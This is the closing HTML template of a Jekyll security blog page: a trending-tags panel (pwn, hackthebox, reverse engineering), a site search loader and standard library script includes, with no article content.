    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

    
      
      <a class="post-tag" href="/blog/en/tags/pwn/">pwn</a>
    
      
      <a class="post-tag" href="/blog/en/tags/hackthebox/">hackthebox</a>
    
      
      <a class="post-tag" href="/blog/en/tags/network/">network</a>
    
      
      <a class="post-tag" href="/blog/en/tags/reverse-engineer/">reverse engineer</a>
    
      
      <a class="post-tag" href="/blog/en/tags/kma/">kma</a>
    
      
      <a class="post-tag" href="/blog/en/tags/machine/">machine</a>
    
      
      <a class="post-tag" href="/blog/en/tags/content/">content</a>
    
      
      <a class="post-tag" href="/blog/en/tags/miscs/">miscs</a>
    
      
      <a class="post-tag" href="/blog/en/tags/on-going/">On-going</a>
    
      
      <a class="post-tag" href="/blog/en/tags/practical-reverse-engineering/">Practical Reverse Engineering</a>
    

    </div>
  </div>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>


    </div> <!-- #main-wrapper -->

    

    <div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/blog/en/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No result founds.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>


    <!--
  JS selector for site.
-->

<!-- layout specified -->


  



  <!-- image lazy-loading & popup -->
  <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/clipboard@2/dist/clipboard.min.js"></script>





<script defer src="/blog/en/assets/js/dist/post.min.js"></script>



<!-- commons -->

<script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script>




  </body>

</html>

